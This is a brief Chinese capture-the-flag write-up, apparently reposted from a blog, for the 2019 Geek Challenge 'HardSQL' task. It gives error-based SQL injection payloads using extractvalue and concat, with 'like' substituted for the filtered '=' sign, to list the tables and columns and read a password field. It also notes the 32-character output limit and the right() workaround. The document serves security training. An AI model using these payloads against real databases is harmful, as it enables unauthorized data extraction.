[极客大挑战 2019]HardSQL
作者:互联网
-
首先拿到题目,使用 ' 进行尝试,发现输出了错误信息,直接使用报错注入的方式尝试
-
在尝试的过程中发现过滤了=,这里我们可以使用like进行替换,然后就是正常的报错注入流程了
-
爆名
admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))#
-
爆字段
admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))#
-
查数据
admin'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)))))#
-
这里最关键的点来了,我们爆出来的是部分flag
extractvalue和updatexml只显示32围字符
所以我们需要使用right()函数爆出右边的部分flag
标签:极客,extractvalue,HardSQL,0x7e,2019,select,table,concat,schema 来源: https://www.cnblogs.com/lzwhehe/p/15546487.html